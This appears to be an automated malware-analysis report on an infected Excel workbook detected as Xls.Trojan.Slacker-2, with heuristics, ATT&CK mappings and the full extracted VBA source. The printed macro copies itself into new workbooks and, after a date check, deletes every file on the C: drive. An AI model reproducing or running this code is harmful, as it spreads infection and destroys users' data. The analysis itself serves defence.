MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV (Xls.Trojan.Slacker-2) and triggers critical heuristics for VBA macros and CreateObject calls. In its Workbook_Deactivate handler, the VBA code attempts persistence by copying its own module into a new workbook saved as 'Book1.' in the application's startup path, and re-injects itself into the active workbook's ThisWorkbook module if the '<!--bum04-->' marker comment is missing. It then checks for 'c:\windows\system\bum.dll' and, if the DLL is absent and the system date is later than July 1, 2001, recursively searches the C: drive and deletes every file found, indicating destructive behavior.
Heuristics (3)
- ClamAV: Xls.Trojan.Slacker-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Slacker-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2665 bytes | f73606a23b43d3423b2110c840039fd64d47bd584dfb60edf4471946b5e9f8c3 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--bum04-->
Private Sub Workbook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
Book1Obj.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Book1Obj.Close
xlApp.Quit
End If
If AW.Lines(1, 1) <> "'<!--bum04-->" Then
AW.DeleteLines 1, AW.CountofLines
AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
End If
Bum (101)
End Sub
Function Bum(id As Integer)
check = False
If UCase(Dir("c:\windows\system\bum.dll")) = "BUM.DLL" Then check = True
If check = False And Date > #7/1/2001# Then
With Application.FileSearch
.NewSearch
.LookIn = "C:"
.FileType = 2
.SearchSubFolders = True
If .Execute() > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```